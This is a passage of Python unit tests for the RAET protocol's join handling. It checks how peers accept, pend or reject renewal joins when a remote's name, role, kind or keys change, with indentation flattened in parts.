alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Rejected
beta.keep.rejectRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.rejected.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
alpha.local.role = 'alpha_new'
self.assertIs(alpha.local.role, 'alpha_new')
self.assertNotEqual(alpha.local.role, oldRole)
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Ensure beta knows nothing about the new role
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
self.assertIn('joinent_rx_pend', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(beta.mutable, True)
self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertFalse(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(betaRemoteAlpha.role, alpha.local.role)
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], alpha.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Reject the transaction
alpha.clearStats()
beta.clearStats()
console.terse("\nAccept Transaction **************\n")
beta.keep.rejectRemote(betaRemoteAlpha)
self.serviceStacks([alpha, beta], duration=6.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertTrue(beta.mutable)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
self.assertEqual(betaRemoteAlpha.role, alpha.local.role)
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerVacuousRejectedRejectSameAll(self):
        '''
        Test joiner reject rejected vacuous renewal join with same all (C1)

        Alpha's role is already Rejected in beta's keep and nothing about
        alpha has changed (sameall), so beta rejects the renewal join,
        removes its remote, and clears the dumped remote data.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectSameAll.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Name: Old
        # Main: Old
        # Kind: Old
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: Old
        # Sameness: SameAll
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: Either (use Yes as more loyal)
        beta.mutable = True
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject, Remove Clear
        for stack in [alpha, beta]:
            self.assertTrue(len(stack.stats) > 0)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        # beta removed its remote; alpha still holds one with an open transaction
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 0)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertNotIn('joinent_transaction_failure', alpha.stats)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousRejectedRejectSameRoleKeys(self):
        '''
        Test joiner reject rejected vacuous renewal join with same role/keys (C2)

        Alpha's role is Rejected in beta's keep; alpha renames itself but
        keeps the same role and keys, so beta rejects the renewal join and
        clears the dumped remote data.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectSameRoleKeys.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Name: Either
        oldName = alpha.name
        newName = '{0}_new'.format(oldName)
        alpha.name = newName
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: Old
        # Sameness: Same Role/Keys
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: Either
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject, Remove Clear
        for stack in [alpha, beta]:
            self.assertTrue(len(stack.stats) > 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertEqual(len(alpha.transactions), 0)
        self.assertEqual(len(beta.transactions), 0)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousRejectedNorenewRejectSameAll(self):
        '''
        Test joiner reject rejected vacuous no renewal join with same all (C3)
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousRejectedNorenewRejectSameAll.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: Yes
        # Pre-seed beta with a remote for alpha (fuid=0 makes the join vacuous)
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): alphaRemote is constructed with stack=beta but added to
        # alpha below — confirm this is intended; sibling tests typically pass
        # the owning stack when constructing the remote.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Name: Body
        # Main: Body
        # Kind: Body
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Body
        # Keys: Body
        # Sameness: SameAll
        # Snapshot betaRemote's state so we can verify the reject left it unchanged
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: Either (use Yes as more loyal)
        beta.mutable = True
        # Test
        # Renew: No
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=False)
        # Action: Reject, Remove Clear
        for stack in [alpha, beta]:
            self.assertTrue(len(stack.stats) > 0)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        # Beta removed its remote (Remove Clear); alpha still holds its side
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 0)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertNotIn('joinent_transaction_failure', alpha.stats)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
        # Check remote dump: remote data cleared on reject
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump: role record persists with rejected status
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerVacuousAcceptNewName(self):
'''
Test mutable joiner accept vacuous renewal join with updated name (D1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.name, newName)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewMain(self):
'''
Test mutable joiner accept vacuous renewal join with updated main (D2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Main: New, it can only happen if old Main value is False (or None) it's because Joinent could only be main
# to accept transaction. So bootstrap slave alpha joined to main beta. Then set alpha to be main and rejoin.
beta, alpha = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: New
oldMain = None
newMain = True
self.assertIs(alpha.main, oldMain)
alpha.main = newMain
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.main, newMain)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewKind(self):
'''
Test mutable joiner accept vacuous renewal join with updated kind (D3)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertNotEqual(oldKind, newKind)
alpha.kind = newKind
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.kind, newKind)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewKeys(self):
'''
Test mutable joiner accept vacuous renewal join with updated keys (D4)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
betaRemote = beta.remotes.values()[0]
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.verfer.keyhex, alpha.local.signer.verhex)
self.assertEqual(betaRemote.pubber.keyhex, alpha.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewRole(self):
'''
Test mutable joiner accept vacuous renewal join with updated role (D5)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
# Keys: Either
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Ensure beta knows nothing about new role
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptSameAll(self):
'''
Test joiner accept vacuous renewal join with sameall (E1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always (use never as most strict)
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either (use false as more strict)
self.assertIs(beta.mutable, None)
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
